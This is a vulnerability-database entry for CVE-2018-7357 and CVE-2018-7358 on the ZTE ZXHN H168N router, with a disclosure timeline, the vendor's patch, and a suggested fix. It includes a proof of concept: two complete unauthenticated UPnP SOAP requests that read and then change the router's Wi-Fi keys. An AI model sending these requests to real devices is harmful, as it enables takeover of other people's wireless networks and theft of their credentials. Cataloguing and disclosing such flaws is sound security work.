ID
VAR-E-201812-0237
CVE
| cve_id: | CVE-2018-7357 | Trust: 1.5 |
| cve_id: | CVE-2018-7358 | Trust: 1.5 |
EDB ID
45972
TITLE
ZTE ZXHN H168N - Improper Access Restrictions - Hardware webapps Exploit
Trust: 0.6
DESCRIPTION
ZTE ZXHN H168N - Improper Access Restrictions. CVE-2018-7358CVE-2018-7357 . webapps exploit for Hardware platform
Trust: 0.6
AFFECTED PRODUCTS
| vendor: | zte | model: | zxhn h168n | scope: | - | version: | - | Trust: 1.6 |
| vendor: | zte | model: | home gateway zxhn h168n access control | scope: | eq | version: | 2.2 | Trust: 0.5 |
EXPLOIT
[*] POC: (CVE-2018-7357 and CVE-2018-7358)
Disclaimer: [This POC is for Educational Purposes , I would Not be
responsible for any misuse of the information mentioned in this blog post]
[+] Unauthenticated
[+] Author: Usman Saeed (usman [at] xc0re.net)
[+] Protocol: UPnP
[+] Affected Harware/Software:
Model name: ZXHN H168N v2.2
Build Timestamp: 20171127193202
Software Version: V2.2.0_PK1.2T5
[+] Findings:
1. Unauthenticated access to WLAN password:
POST /control/igd/wlanc_1_1 HTTP/1.1
Host: <IP>:52869
User-Agent: {omitted}
Content-Length: 288
Connection: close
Content-Type: text/xml; charset=”utf-8″
SOAPACTION: “urn:dslforum-org:service:WLANConfiguration:1#GetSecurityKeys” 1
<?xml version=”1.0″ encoding=”utf-8″?>
<s:Envelope xmlns:s=”http://schemas.xmlsoap.org/soap/envelope/” s:encodingStyle=”http://schemas.xmlsoap.org/soap/encoding/”><s:Body><u:GetSecurityKeys xmlns:u=”urn:dslforum-org:service:WLANConfiguration:1″></u:GetSecurityKeys></s:Body></s:Envelope>
2. Unauthenticated WLAN passphrase change:
POST /control/igd/wlanc_1_1 HTTP/1.1
Host: <IP>:52869
User-Agent: {omitted}
Content-Length: 496
Connection: close
Content-Type: text/xml; charset=”utf-8″
SOAPACTION: “urn:dslforum-org:service:WLANConfiguration:1#SetSecurityKeys”
<?xml version=”1.0″ encoding=”utf-8″?>
<s:Envelope xmlns:s=”http://schemas.xmlsoap.org/soap/envelope/” s:encodingStyle=”http://schemas.xmlsoap.org/soap/encoding/”><s:Body><u:SetSecurityKeys xmlns:u=”urn:dslforum-org:service:WLANConfiguration:1″><NewWEPKey0>{omitted}</NewWEPKey0><NewWEPKey1>{omitted}</NewWEPKey1><NewWEPKey2>{omitted}</NewWEPKey2><NewWEPKey3>{omitted}</NewWEPKey3><NewPreSharedKey>{omitted}</NewPreSharedKey><NewKeyPassphrase>{omitted}</NewKeyPassphrase></u:SetSecurityKeys></s:Body></s:Envelope>
[*] Solution:
UPnP should not provide excessive services, and if the fix is not possible, then UPnP should be disabled on the affected devices.
[*] Note:
There are other services which should not be published over UPnP, which are not mentioned in this blog post, as the solution is the same.
[+] Responsible Disclosure:
Vulnerabilities identified – 20 August, 2018
Reported to ZTE – 28 August, 2018
ZTE official statement – 17 September 2018
ZTE patched the vulnerability – 12 November 2018
The operator pushed the update – 12 November 2018
CVE published – Later
Public disclosure – 12 November 2018
Ref: http://support.zte.com.cn/support/news/LoopholeInfoDetail.aspx?newsId=1009522
Trust: 1.0
EXPLOIT LANGUAGE
txt
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
Improper Access Restrictions
Trust: 1.6
TAGS
| tag: | exploit | Trust: 0.5 |
| tag: | vulnerability | Trust: 0.5 |
| tag: | bypass | Trust: 0.5 |
| tag: | info disclosure | Trust: 0.5 |
CREDITS
Usman Saeed
Trust: 0.6
EXTERNAL IDS
| db: | ZTE | id: | 1009522 | Trust: 2.7 |
| db: | EXPLOIT-DB | id: | 45972 | Trust: 1.6 |
| db: | NVD | id: | CVE-2018-7357 | Trust: 1.5 |
| db: | NVD | id: | CVE-2018-7358 | Trust: 1.5 |
| db: | 0DAYTODAY | id: | 31756 | Trust: 0.6 |
| db: | EDBNET | id: | 100495 | Trust: 0.6 |
| db: | EDBNET | id: | 100531 | Trust: 0.6 |
| db: | PACKETSTORM | id: | 150728 | Trust: 0.5 |
REFERENCES
| url: | https://nvd.nist.gov/vuln/detail/cve-2018-7358 | Trust: 1.5 |
| url: | https://nvd.nist.gov/vuln/detail/cve-2018-7357 | Trust: 1.5 |
| url: | https://0day.today/exploits/31756 | Trust: 0.6 |
| url: | https://www.exploit-db.com/exploits/45972/ | Trust: 0.6 |
SOURCES
| db: | PACKETSTORM | id: | 150728 |
| db: | EXPLOIT-DB | id: | 45972 |
| db: | EDBNET | id: | 100495 |
| db: | EDBNET | id: | 100531 |
LAST UPDATE DATE
2022-07-27T09:32:13.450000+00:00
SOURCES RELEASE DATE
| db: | PACKETSTORM | id: | 150728 | date: | 2018-12-11T01:49:45 |
| db: | EXPLOIT-DB | id: | 45972 | date: | 2018-12-11T00:00:00 |
| db: | EDBNET | id: | 100495 | date: | 2018-12-12T00:00:00 |
| db: | EDBNET | id: | 100531 | date: | 2018-12-16T00:00:00 |